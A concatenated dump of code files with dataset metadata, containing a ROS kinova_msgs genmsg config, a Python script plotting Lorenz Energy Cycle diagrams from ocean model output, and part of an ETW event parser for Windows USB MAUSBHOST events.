services_str = "/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/Start.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/Stop.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/HomeArm.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/SetForceControlParams.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/SetEndEffectorOffset.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/SetNullSpaceModeState.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/SetTorqueControlMode.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/SetTorqueControlParameters.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/ClearTrajectories.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/ZeroTorques.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/AddPoseToCartesianTrajectory.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/RunCOMParametersEstimation.srv"
pkg_name = "kinova_msgs"
dependencies_str = "actionlib_msgs;geometry_msgs"
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
dep_include_paths_str = "kinova_msgs;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/msg;kinova_msgs;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg;actionlib_msgs;/opt/ros/kinetic/share/actionlib_msgs/cmake/../msg;geometry_msgs;/opt/ros/kinetic/share/geometry_msgs/cmake/../msg;std_msgs;/opt/ros/kinetic/share/std_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/kinetic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
| 421.75
| 3,218
| 0.864058
| 703
| 5,061
| 6.032717
| 0.142248
| 0.122613
| 0.277293
| 0.346616
| 0.703372
| 0.687809
| 0.687809
| 0.683094
| 0.683094
| 0.683094
| 0
| 0
| 0.006718
| 5,061
| 11
| 3,219
| 460.090909
| 0.843644
| 0.009682
| 0
| 0
| 1
| 0.333333
| 0.959481
| 0.953493
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
42c45984a475d4bf6db8adbb57565c28ec003479
| 15,190
|
py
|
Python
|
src/py/LEC-paper-boxplots.py
|
AJueling/LEC
|
f720aa8cec147d8f9acab00c1d1de3bd8fc40b6e
|
[
"BSD-3-Clause"
] | 1
|
2021-10-05T12:45:58.000Z
|
2021-10-05T12:45:58.000Z
|
src/py/LEC-paper-boxplots.py
|
AJueling/LEC
|
f720aa8cec147d8f9acab00c1d1de3bd8fc40b6e
|
[
"BSD-3-Clause"
] | null | null | null |
src/py/LEC-paper-boxplots.py
|
AJueling/LEC
|
f720aa8cec147d8f9acab00c1d1de3bd8fc40b6e
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import matplotlib.ticker as mticker
from matplotlib.collections import PatchCollection
from read_output import LEC_global, analyze_LEC
def LEC4_overview(df, name, letter):
"""
creates a Lorenz Energy Cycle plot with reseroir, generation, exchange, and dissipation terms
"""
fig, ax = plt.subplots(figsize=(10,10))
ax.set_aspect('equal')
ax.set_ylim((0,5))
ax.set_xlim((0,5))
grid = np.mgrid[0.5:4.5:5j, 0.5:4.5:5j].reshape(2, -1).T
patches1, patches2 = [], []
pos = [8, 6, 18, 16, 3, 1, 23, 21, 7, 17, 13, 11, 9, 5, 19, 15]
titles = ['mean\npotential\nenergy','eddy\npotential\nenergy','mean\nkinetic\nenergy','eddy\nkinetic\nenergy',\
"G(P$_m$)","G(P$_e$)","G(K$_m$)","G(K$_e$)",\
"C(P$_e$,P$_m$)","C(K$_e$,K$_m$)","C(P$_m$,K$_m$)","C(P$_e$,K$_e$)",\
"D(P$_m$)","D(P$_e$)","D(K$_m$)","D(K$_e$)"]
POP = [df['rPm'].mean() ,df['rPe'].mean() ,df['rKm'].mean() ,df['rKe'].mean(),\
df['gPm'].mean() ,df['gPe'].mean() ,df['gKm'].mean() ,df['gKe'].mean(),\
df['cPem'].mean(),df['cKem'].mean(),df['cPKm'].mean(),df['cPKe'].mean(),\
df['dPm'].mean() ,df['dPe'].mean() ,df['dKm'].mean() ,df['dKe'].mean()]
POP_var = [df['rPm'].std() ,df['rPe'].std() ,df['rKm'].std() ,df['rKe'].std(),\
df['gPm'].std() ,df['gPe'].std() ,df['gKm'].std() ,df['gKe'].std(),\
df['cPem'].std() ,df['cKem'].std() ,df['cPKm'].std() ,df['cPKe'].std(),\
df['dPm'].std() ,df['dPe'].std() ,df['dKm'].std() ,df['dKe'].std()]
total = df['gPm'].mean() + df['gPe'].mean() + df['gKm'].mean() + df['gKe'].mean()
color_values2 = []
rarrow_list = []
larrow_list = []
darrow_list = []
uarrow_list = []
ax.text(grid[4][0]-.45,grid[4][1]+.25,f'{letter}) {name}',fontsize=24,ha='left')
for i in [4,5,10,11]: #rarrow_list
if POP[i]>=0.0:
rarrow_list.append(i)
else:
larrow_list.append(i)
for i in [6,7]: #rarrow_list
if POP[i]>=0.0:
larrow_list.append(i)
else:
rarrow_list.append(i)
for i in [8,9,12,14]: #uarrow_list
if POP[i]>=0.0:
uarrow_list.append(i)
else:
darrow_list.append(i)
for i in [13,15]: #darrow_list
if POP[i]>=0.0:
darrow_list.append(i)
else:
uarrow_list.append(i)
for i in range(len(pos)):
if i<4:
rect = mpatches.FancyBboxPatch(grid[pos[i]] - [0.375, 0.375], 0.75, 0.75,\
boxstyle=mpatches.BoxStyle("Round", pad=0.1))
if i in rarrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0]-.47, y=grid[pos[i]][1], dx=.94,dy=0.0,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i in larrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0]+.47, y=grid[pos[i]][1], dx=-.94,dy=0.0,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i in darrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0], y=grid[pos[i]][1]+.47, dx=0.,dy=-.94,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i in uarrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0], y=grid[pos[i]][1]-.47, dx=0.,dy=.94,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i<4: # energy reservoirs
plt.text(grid[pos[i]][0], grid[pos[i]][1]+0.2, titles[i],\
ha="center",va="center", family='sans-serif', size=16,weight='bold')
plt.text(grid[pos[i]][0], grid[pos[i]][1]-0.14, "{:4.1f}".format(POP[i]/1e18)+' EJ',\
ha="center",va="center", family='sans-serif', size=16)
plt.text(grid[pos[i]][0], grid[pos[i]][1]-.3, "$\pm${:3.2f}".format(POP_var[i]/1e18)+' EJ',\
ha="center",va="center", family='sans-serif', size=16)
patches1.append(rect)
elif i>=4: # power transfer terms
if i in larrow_list: a,b = .08, 0.
elif i in rarrow_list: a,b = -.08, 0.
elif i in uarrow_list: a,b = 0. , -.08
elif i in darrow_list: a,b = 0. , .08
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]+0.24+b, titles[i],\
ha="center",va="center", family='sans-serif', size=16,weight='bold')
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]+0.08+b, "({:4.1f}".format(abs(POP[i]/total)*100.0)+' %)',\
ha="center",va="center", family='sans-serif', size=14)
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]-0.08+b, "{:4.2f}".format(POP[i]/1e12)+' TW',\
ha="center",va="center", family='sans-serif', size=16)
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]-0.24+b, "$\pm${:2.0f}".format(abs(POP_var[i])/1e9)+' GW',\
ha="center",va="center", family='sans-serif', size=16)
patches2.append(arrw)
color_values2.append(abs(POP[i]))
collection1 = PatchCollection(patches1, color='CornflowerBlue', alpha=.6)
ax.add_collection(collection1)
collection2 = PatchCollection(patches2, cmap='autumn', alpha=.7)
collection2.set_array(np.array(-np.array(color_values2)))
ax.add_collection(collection2)
plt.axis('off')
plt.savefig('../../results/SOM_paper/LEC4_overview_'+name+'.png',bbox_inches='tight',dpi=100, author='Andre Jueling')
plt.savefig('../../results/SOM_paper/LEC4_overview_'+name+'.eps',bbox_inches='tight',format='eps', author='Andre Jueling')
plt.savefig('../../results/SOM_paper/LEC4_overview_'+name+'.pdf',bbox_inches='tight',format='pdf', author='Andre Jueling')
def LEC4_BT_overview(df, name, letter):
"""
same as above but with Km boundary term
df contains 'df_SO30' and 'budget' dataframes
"""
fig, ax = plt.subplots(figsize=(10,10))
ax.set_aspect('equal')
ax.set_ylim((0,5))
ax.set_xlim((0,5))
grid = np.mgrid[0.5:4.5:5j, 0.5:4.5:5j].reshape(2, -1).T
patches1, patches2 = [], []
pos = [8, 6, 18, 16, 3, 1, 23, 21, 7, 17, 13, 11, 9, 5, 19, 15, 24]
titles = ['mean\npotential\nenergy','eddy\npotential\nenergy','mean\nkinetic\nenergy','eddy\nkinetic\nenergy',\
"G(P$_m$)","G(P$_e$)","G(K$_m$)","G(K$_e$)",\
"C(P$_e$,P$_m$)","C(K$_e$,K$_m$)","C(P$_m$,K$_m$)","C(P$_e$,K$_e$)",\
"D/B(P$_m$)","D/B(P$_e$)","D(K$_m$)","D/B(K$_e$)",\
"B(K$_m$)"]
POP = [df['rPm'].mean() ,df['rPe'].mean() ,df['rKm'].mean() ,df['rKe'].mean(), \
df['gPm'].mean() ,df['gPe'].mean() ,df['gKm'].mean() ,df['gKe'].mean(), \
df['cPem'].mean(),df['cKem'].mean(),df['cPKm'].mean() ,df['cPKe'].mean(),\
df['dPm'].mean() ,df['dPe'].mean() ,df['dKm_mbt'].mean() ,df['dKe'].mean(), \
df['bKm'].mean() ]
POP_var = [df['rPm'].std() ,df['rPe'].std() ,df['rKm'].std() ,df['rKe'].std(), \
df['gPm'].std() ,df['gPe'].std() ,df['gKm'].std() ,df['gKe'].std(), \
df['cPem'].std() ,df['cKem'].std() ,df['cPKm'].std() ,df['cPKe'].std(), \
df['dPm'].std() ,df['dPe'].std() ,df['dKm_mbt'].std() ,df['dKe'].std(), \
df['bKm'].std() ]
total = df['gPm'].mean() + df['gPe'].mean() + df['gKm'].mean() + df['gKe'].mean()
color_values2 = []
rarrow_list = []
larrow_list = []
darrow_list = []
uarrow_list = []
barrow_list = [16]
ax.text(grid[4][0]-.45,grid[4][1]+.25,f'{letter}) {name}',fontsize=24,ha='left')
for i in [4,5,10,11]: #rarrow_list
if POP[i]>=0.0:
rarrow_list.append(i)
else:
larrow_list.append(i)
for i in [6,7]: #rarrow_list
if POP[i]>=0.0:
larrow_list.append(i)
else:
rarrow_list.append(i)
for i in [8,9,12,14]: #uarrow_list
if POP[i]>=0.0:
uarrow_list.append(i)
else:
darrow_list.append(i)
for i in [13,15]: #darrow_list
if POP[i]>=0.0:
darrow_list.append(i)
else:
uarrow_list.append(i)
for i in range(len(pos)):
if i<4:
rect = mpatches.FancyBboxPatch(grid[pos[i]] - [0.375, 0.375], 0.75, 0.75,\
boxstyle=mpatches.BoxStyle("Round", pad=0.1))
if i in rarrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0]-.47, y=grid[pos[i]][1], dx=.94,dy=0.0,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i in larrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0]+.47, y=grid[pos[i]][1], dx=-.94,dy=0.0,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i in darrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0], y=grid[pos[i]][1]+.47, dx=0.,dy=-.94,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i in uarrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0], y=grid[pos[i]][1]-.47, dx=0.,dy=.94,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i in barrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0]-.35, y=grid[pos[i]][1]-.35, dx=0.65,dy=0.65,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i<4: # energy reservoirs
plt.text(grid[pos[i]][0], grid[pos[i]][1]+0.2, titles[i],\
ha="center",va="center", family='sans-serif', size=16,weight='bold')
if POP[i]>1e18:
plt.text(grid[pos[i]][0], grid[pos[i]][1]-0.14, "{:4.1f}".format(POP[i]/1e18)+' EJ',\
ha="center",va="center", family='sans-serif', size=16)
plt.text(grid[pos[i]][0], grid[pos[i]][1]-.3, "$\pm${:3.1f}".format(POP_var[i]/1e18)+' EJ',\
ha="center",va="center", family='sans-serif', size=16)
patches1.append(rect)
elif POP[i]<1e18 and POP[i]>1e15:
plt.text(grid[pos[i]][0], grid[pos[i]][1]-0.14, "{:4.1f}".format(POP[i]/1e15)+' PJ',\
ha="center",va="center", family='sans-serif', size=16)
plt.text(grid[pos[i]][0], grid[pos[i]][1]-.3, "$\pm${:3.1f}".format(POP_var[i]/1e15)+' PJ',\
ha="center",va="center", family='sans-serif', size=16)
patches1.append(rect)
elif POP[i]<1e15 and POP[i]>1e12:
plt.text(grid[pos[i]][0], grid[pos[i]][1]-0.14, "{:4.1f}".format(POP[i]/1e12)+' TJ',\
ha="center",va="center", family='sans-serif', size=16)
plt.text(grid[pos[i]][0], grid[pos[i]][1]-.3, "$\pm${:3.1f}".format(POP_var[i]/1e12)+' TJ',\
ha="center",va="center", family='sans-serif', size=16)
patches1.append(rect)
elif i>=4:
if i<16: # power transfer terms
if i in larrow_list: a,b = .08, 0.
elif i in rarrow_list: a,b = -.08, 0.
elif i in uarrow_list: a,b = 0. , -.08
elif i in darrow_list: a,b = 0. , .08
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]+0.24+b, titles[i],\
ha="center",va="center", family='sans-serif', size=16,weight='bold')
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]+0.08+b, "({:4.1f}".format(abs(POP[i]/total)*100.0)+' %)',\
ha="center",va="center", family='sans-serif', size=14)
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]-0.08+b, "{:4.0f}".format(POP[i]/1e09)+' GW',\
ha="center",va="center", family='sans-serif', size=16)
if POP_var[i]/1e9>1:
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]-0.24+b, "$\pm${:2.0f}".format(abs(POP_var[i])/1e9)+' GW',\
ha="center",va="center", family='sans-serif', size=16)
else:
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]-0.24+b, "$\pm${:2.1f}".format(abs(POP_var[i])/1e9)+' GW',\
ha="center",va="center", family='sans-serif', size=16)
elif i==16: # boundary term
a = .16/np.sqrt(2)
plt.text(grid[pos[i]][0]+a , grid[pos[i]][1]+a, titles[i], rotation=-45,\
ha="center",va="center", family='sans-serif', size=16,weight='bold')
plt.text(grid[pos[i]][0] , grid[pos[i]][1],\
"({:4.1f}".format(abs(POP[i]/total)*100.0)+' %)', rotation=-45,\
ha="center",va="center", family='sans-serif', size=14)
plt.text(grid[pos[i]][0]-a , grid[pos[i]][1]-a,\
"{:4.0f}".format(POP[i]/1e9)+' GW', rotation=-45,\
ha="center",va="center", family='sans-serif', size=16)
plt.text(grid[pos[i]][0]-2*a, grid[pos[i]][1]-2*a,\
"$\pm${:2.0f}".format(abs(POP_var[i])/1e9)+' GW', rotation=-45,\
ha="center",va="center", family='sans-serif', size=16)
patches2.append(arrw)
color_values2.append(abs(POP[i]))
collection1 = PatchCollection(patches1, color='CornflowerBlue', alpha=.6)
ax.add_collection(collection1)
collection2 = PatchCollection(patches2, cmap='autumn', alpha=.7)
collection2.set_array(np.array(-np.array(color_values2)))
ax.add_collection(collection2)
plt.axis('off')
plt.savefig('../../results/SOM_paper/LEC4_BT_overview_'+name+'.png',bbox_inches='tight',dpi=100, author='Andre Jueling')
plt.savefig('../../results/SOM_paper/LEC4_BT_overview_'+name+'.eps',bbox_inches='tight',format='eps', author='Andre Jueling')
plt.savefig('../../results/SOM_paper/LEC4_BT_overview_'+name+'.pdf',bbox_inches='tight',format='pdf', author='Andre Jueling')
start_year=278
end_year = 325
for t in range(start_year, end_year):
fh = '../../results/analyze_LEC/analysis_LEC_5_'+str(t)+\
'_SO30.out'
tmp = pd.read_csv(fh)
tmp.index = [t]
if t==start_year: df = tmp.drop([t])
df = df.append(tmp)
del tmp, fh
dfg, dfg_anom, dfg_norm = LEC_global('../../results',5)
df_SO30, df_SO30_anom, df_SO30_norm = analyze_LEC('../../results',5,'SO30')
df_WGKP, df_WGKP_anom, df_WGKP_norm = analyze_LEC('../../results',5,'WGKP')
if __name__ == "__main__":
LEC4_overview(dfg,'global','a')
LEC4_BT_overview(df_SO30,'SO30','b')
LEC4_BT_overview(df_WGKP,'WGKP','c')
| 50.973154
| 129
| 0.512179
| 2,307
| 15,190
| 3.274816
| 0.107499
| 0.061152
| 0.069887
| 0.040503
| 0.869887
| 0.85824
| 0.856651
| 0.856651
| 0.856651
| 0.848312
| 0
| 0.061809
| 0.261883
| 15,190
| 298
| 130
| 50.973154
| 0.612023
| 0.025806
| 0
| 0.72332
| 0
| 0
| 0.13788
| 0.030775
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007905
| false
| 0
| 0.031621
| 0
| 0.039526
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
287e63dc77c9a3c3cd4d264ca26f6865a9af7243
| 53,063
|
py
|
Python
|
etl/parsers/etw/Microsoft_Windows_USB_MAUSBHOST.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 104
|
2020-03-04T14:31:31.000Z
|
2022-03-28T02:59:36.000Z
|
etl/parsers/etw/Microsoft_Windows_USB_MAUSBHOST.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 7
|
2020-04-20T09:18:39.000Z
|
2022-03-19T17:06:19.000Z
|
etl/parsers/etw/Microsoft_Windows_USB_MAUSBHOST.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 16
|
2020-03-05T18:55:59.000Z
|
2022-03-01T10:19:28.000Z
|
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-USB-MAUSBHOST
GUID : 7725b5f9-1f2e-4e21-baeb-b2af4690bc87
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=3, version=0)
class Microsoft_Windows_USB_MAUSBHOST_3_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_WdfDevicePowerState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=4, version=0)
class Microsoft_Windows_USB_MAUSBHOST_4_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbTtHubDevice" / Int64ul,
"fid_UsbDevice" / Int64ul,
"DeviceSpeed" / Int32ul,
"PortPathDepth" / Int32ul,
"PortPath" / Int32ul,
"fid_MaUsbDeviceHandle" / Int32ul,
"fid_DeviceIsHub" / Int32ul,
"fid_NumberOfPorts" / Int32ul,
"fid_NumberOfTTs" / Int32ul,
"fid_USB_Device_Descriptor" / Float32l
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=5, version=0)
class Microsoft_Windows_USB_MAUSBHOST_5_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_USB_Endpoint_Descriptor" / Float32l,
"fid_IsLinkManaged" / Int8ul,
"fid_CreditConsumptionUnit" / Int16ul,
"fid_BufferSize" / Int32ul,
"fid_IsochProgrammingDelay" / Int16ul,
"fid_IsochResponseDelay" / Int16ul,
"fid_IsochSegmentsPerFrame" / Int32ul,
"fid_MaxIsochSegmentSize" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=6, version=0)
class Microsoft_Windows_USB_MAUSBHOST_6_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_WdfDevicePowerState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=7, version=0)
class Microsoft_Windows_USB_MAUSBHOST_7_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_WdfDevicePowerState" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=8, version=0)
class Microsoft_Windows_USB_MAUSBHOST_8_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbTtHubDevice" / Int64ul,
"fid_UsbDevice" / Int64ul,
"DeviceSpeed" / Int32ul,
"PortPathDepth" / Int32ul,
"PortPath" / Int32ul,
"fid_MaUsbDeviceHandle" / Int32ul,
"fid_DeviceIsHub" / Int32ul,
"fid_NumberOfPorts" / Int32ul,
"fid_NumberOfTTs" / Int32ul,
"fid_USB_Device_Descriptor" / Float32l
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=9, version=0)
class Microsoft_Windows_USB_MAUSBHOST_9_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbTtHubDevice" / Int64ul,
"fid_UsbDevice" / Int64ul,
"DeviceSpeed" / Int32ul,
"PortPathDepth" / Int32ul,
"PortPath" / Int32ul,
"fid_MaUsbDeviceHandle" / Int32ul,
"fid_DeviceIsHub" / Int32ul,
"fid_NumberOfPorts" / Int32ul,
"fid_NumberOfTTs" / Int32ul,
"fid_USB_Device_Descriptor" / Float32l
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=10, version=0)
class Microsoft_Windows_USB_MAUSBHOST_10_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbTtHubDevice" / Int64ul,
"fid_UsbDevice" / Int64ul,
"DeviceSpeed" / Int32ul,
"PortPathDepth" / Int32ul,
"PortPath" / Int32ul,
"fid_MaUsbDeviceHandle" / Int32ul,
"fid_DeviceIsHub" / Int32ul,
"fid_NumberOfPorts" / Int32ul,
"fid_NumberOfTTs" / Int32ul,
"fid_USB_Device_Descriptor" / Float32l
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=11, version=0)
class Microsoft_Windows_USB_MAUSBHOST_11_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_USB_Endpoint_Descriptor" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=12, version=0)
class Microsoft_Windows_USB_MAUSBHOST_12_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_USB_Endpoint_Descriptor" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=13, version=0)
class Microsoft_Windows_USB_MAUSBHOST_13_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_USB_Endpoint_Descriptor" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=15, version=0)
class Microsoft_Windows_USB_MAUSBHOST_15_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_DeviceState" / Int32ul,
"fid_PowerAction" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=16, version=0)
class Microsoft_Windows_USB_MAUSBHOST_16_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_DeviceState" / Int32ul,
"fid_PowerAction" / Int32ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=17, version=0)
class Microsoft_Windows_USB_MAUSBHOST_17_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_DeviceState" / Int32ul,
"fid_PowerAction" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=18, version=0)
class Microsoft_Windows_USB_MAUSBHOST_18_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_DeviceState" / Int32ul,
"fid_PowerAction" / Int32ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=19, version=0)
class Microsoft_Windows_USB_MAUSBHOST_19_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=20, version=0)
class Microsoft_Windows_USB_MAUSBHOST_20_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=21, version=0)
class Microsoft_Windows_USB_MAUSBHOST_21_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_Capability" / Guid,
"fid_NtStatus" / Int32ul,
"fid_NumStaticStreams" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=50, version=0)
class Microsoft_Windows_USB_MAUSBHOST_50_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_WdfRequest" / Int64ul,
"fid_SubType" / Int8ul,
"fid_DeviceHandle" / Int16ul,
"fid_DeviceAddress" / Int8ul,
"fid_Ssid" / Int8ul,
"fid_StatusCode" / Int8ul,
"fid_DialogToken" / Int16ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=51, version=0)
class Microsoft_Windows_USB_MAUSBHOST_51_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_WdfRequest" / Int64ul,
"fid_SubType" / Int8ul,
"fid_DeviceHandle" / Int16ul,
"fid_DeviceAddress" / Int8ul,
"fid_Ssid" / Int8ul,
"fid_StatusCode" / Int8ul,
"fid_DialogToken" / Int16ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=52, version=0)
class Microsoft_Windows_USB_MAUSBHOST_52_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_WdfRequest" / Int64ul,
"fid_SubType" / Int8ul,
"fid_DeviceHandle" / Int16ul,
"fid_DeviceAddress" / Int8ul,
"fid_Ssid" / Int8ul,
"fid_StatusCode" / Int8ul,
"fid_DialogToken" / Int16ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=53, version=0)
class Microsoft_Windows_USB_MAUSBHOST_53_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_WdfRequest" / Int64ul,
"fid_SubType" / Int8ul,
"fid_DeviceHandle" / Int16ul,
"fid_DeviceAddress" / Int8ul,
"fid_Ssid" / Int8ul,
"fid_StatusCode" / Int8ul,
"fid_DialogToken" / Int16ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=54, version=0)
class Microsoft_Windows_USB_MAUSBHOST_54_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_Error" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=55, version=0)
class Microsoft_Windows_USB_MAUSBHOST_55_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_ExpectedSubtype" / Int32ul,
"fid_ActualSubtype" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=56, version=0)
class Microsoft_Windows_USB_MAUSBHOST_56_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_Subtype" / Int32ul,
"fid_NtStatus" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=57, version=0)
class Microsoft_Windows_USB_MAUSBHOST_57_0(Etw):
pattern = Struct(
